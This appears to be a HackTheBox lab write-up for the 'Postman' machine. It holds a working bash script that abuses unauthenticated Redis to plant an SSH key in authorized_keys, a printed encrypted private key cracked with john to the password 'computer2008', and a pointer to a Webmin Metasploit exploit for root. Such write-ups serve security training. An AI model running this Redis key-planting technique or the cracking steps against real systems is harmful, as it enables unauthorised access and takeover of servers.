Postman HackTheBox Walkthrough

Postman – HackTheBox Machine Walkthrough

Postman machine from HTB places in easy machines category still the method is difficult unless you not using Metasploit directly.

Nmap Scan

In Nmap scanning I found port  22, 80, 6379 -TCP /  redis and 10000 -TCP is open. You need to scan all ports otherwise port 6379 will not display.

Radis Enumeration & Exploit

After Nmap scanning is done we found port 6379 and port 10000 are interesting so after some work, I found on 10000 port there is the Webmin login page. On port 6379 which name is redis, I find on google about radis and I got 1 interesting link-

Redis Enumeration:- https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

Using these commands you can make script or use them directly.

Redis Script

#!/bin/bash       rm ~/.ssh/id*   ssh-keygen -t rsa       (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "n\n") > foo.txt       redis-cli -h 10.10.10.160 flushall    cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit    redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/   redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"   redis-cli -h 10.10.10.160 save       ssh -i ~/.ssh/id_rsa redis@10.10.10.160 

Source: https://github.com/Tatik07/Hackthebox/blob/master/Redis_exploit.sh

After using that script I can access Redis shell. In-home directory we can see the user name is Matt

Privilege Escalation

After using LinEnum script & searching some directories got ssh RSA key in /opt Directory.

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX

cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2

7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6

cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9

1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv

EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP

UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY

Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK

t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS

5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke

P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6

jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge

SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i

l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X

0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p

S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR

hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+

Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V

XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD

b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi

WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh

KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm

npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ

VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W

X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==

-----END RSA PRIVATE KEY-----

We need to crack this key so we can use ssh2john.py tool then crack that key using john tool with rockyou.txt

 # python3 /usr/share/john/ssh2john.py key.txt > loll

#john --wordlist (rockyou location) ( filename )

The password is computer2008 & the user is Matt.

Webmin Exploit Using Metasploit

There are many exploits of webmin. After using packageup remote exploit got root access.

 &